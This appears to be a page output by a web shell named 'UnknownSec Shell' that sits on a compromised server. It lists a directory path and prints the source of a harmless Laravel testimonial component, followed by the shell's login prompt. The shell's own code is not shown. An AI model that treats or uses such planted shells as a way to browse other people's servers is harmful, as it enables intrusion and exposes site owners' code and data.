shell bypass 403

UnknownSec Shell

: /home/bouloter/infix/app/View/Components/ [ drwxr-xr-x ]

name : AboutPageTestimonial.php
<?php

namespace App\View\Components;

use App\Traits\Tenantable;
use Illuminate\View\Component;
use Illuminate\Support\Facades\DB;
use Illuminate\Support\Facades\Cache;
use Modules\SystemSetting\Entities\Testimonial;

class AboutPageTestimonial extends Component
{
    use Tenantable;
    public $frontendContent;

    public function __construct($frontendContent)
    {
        $this->frontendContent = $frontendContent;
    }


    public function render()
    {
        $testimonials = Cache::rememberForever('TestimonialList_'. app()->getLocale().SaasDomain(), function () {
            return Testimonial::select('body', 'image', 'author', 'profession', 'star')
                ->where('status', '=', 1)
                ->get();
        });
        return view(theme('components.about-page-testimonial'), compact('testimonials'));
    }
}

© 2025 UnknownSec
afwwrfwafr45458465
Password